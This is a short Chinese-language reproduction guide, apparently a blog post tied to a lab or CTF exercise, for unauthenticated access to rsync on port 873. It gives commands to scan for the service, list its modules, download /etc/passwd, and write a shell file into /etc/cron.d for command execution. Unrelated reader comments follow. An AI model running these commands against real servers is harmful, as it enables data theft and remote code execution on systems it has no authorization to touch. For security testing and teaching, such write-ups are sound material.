漏洞描述:rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。
rsync未授权访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。
影响版本:全版本
参考资料:
- https://www.cnblogs.com/renhaoblog/p/13279101.html
- https://fansonfan.github.io/2019/04/20/rsync-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
- https://www.freebuf.com/column/202771.html
漏洞复现
- 使用nmap扫描目标系统是否开放
rsync服务
nmap -p 873 ip
- 使用以下两条命令,列出目标服务器的同步目录
rsync ip::
rsync rsync://ip:873
- 在路径后面添加目录名即可查看目录中的文件
rsync ip::src
- 获取flag
其它操作
任意下载
rsync -av rsync://your-ip:873/src/etc/passwd ./
写入任意文件
rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
cesfe 2个月前0
好的,谢谢昶之琴 2个月前0
这个安装地址失效了,我在网上找了一个:https://xiazai.zol.com.cn/detail/35/344340.shtml 如果还是不行的话就需要您自己去网上找找了cesfe 2个月前0
帆软部署 ,访问的地址访问不到昶之琴 2年前0
我以为只要提交就行了好想告诉你 2年前0
花巨资看一下